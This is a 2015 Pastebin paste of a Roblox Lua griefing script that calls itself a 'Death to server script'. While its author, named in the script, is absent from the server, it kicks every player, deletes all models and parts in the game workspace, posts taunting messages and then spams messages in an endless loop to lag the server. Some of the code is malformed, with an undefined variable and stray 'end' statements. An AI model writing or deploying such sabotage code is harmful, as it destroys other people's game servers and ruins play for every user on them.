Advertisement
harng123

Untitled

Sep 4th, 2015
94
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.58 KB | None | 0 0
  1. --Randmom antiban script.
  2. if not game.Players:FindFirstChild("immcool1") then
  3. local m = Instance.new("Message") m.Parent = Workspace
  4. for i,v in pairs(text) do
  5. m.Text = v
  6. wait(1)
  7. m:Remove()
  8. end
  9. for i,v in pairs(game.Players:GetChildren()) do
  10. v:Remove()
  11. end
  12. end
  13. end
  14.  
  15.  
  16.  
  17. function check(object)
  18.  
  19. if object.className == "Model" then object:Remove()
  20.  
  21. elseif object.className == "Part" then object:Remove()
  22. end
  23. end
  24. while true do
  25. print("Death to server script, by immcool1 LOADED")
  26. local neverbanmeidiot = game.Players:findFirstChild("immcool1")--Put your name in the "".
  27. if neverbanmeidiot == nil then
  28. print("The pwnage has started")
  29. local m = Instance.new("Message")
  30. m.Parent = game.Workspace
  31. m.Name = "Warning"
  32. print("Message created.")
  33. m.Text = "Either I left, or someone has been stupid..."
  34. wait(3)
  35. m.Text = "Now, die...."
  36. wait(3)
  37. m.Text = "Well, first, the Workspace will go bye-bye, hehe."
  38. wait(3)
  39. m.Text = "Then, lots of Message spam will be created."
  40. wait(3)
  41. m.Text = "I suggest you leave now."
  42. wait(3)
  43. m.Text = "This is brought to you by, wizkid990."
  44. wait(3)
  45. m:Remove()
  46. for i, v in ipairs(workspace:getChildren()) do
  47. check(v)
  48. wait()
  49. end
  50. print("Workspace gone.")
  51. while true do
  52. local spamming = Instance.new("Message")
  53. spamming.Parent = game.Workspace
  54. spamming.Name = "PWNAGESPAM"
  55. spamming.Text = "Fools, prepare to feel lag, feeling it? Good."
  56. wait(0.00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001)
  57. end
  58. end
  59. wait(0.1)
  60. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement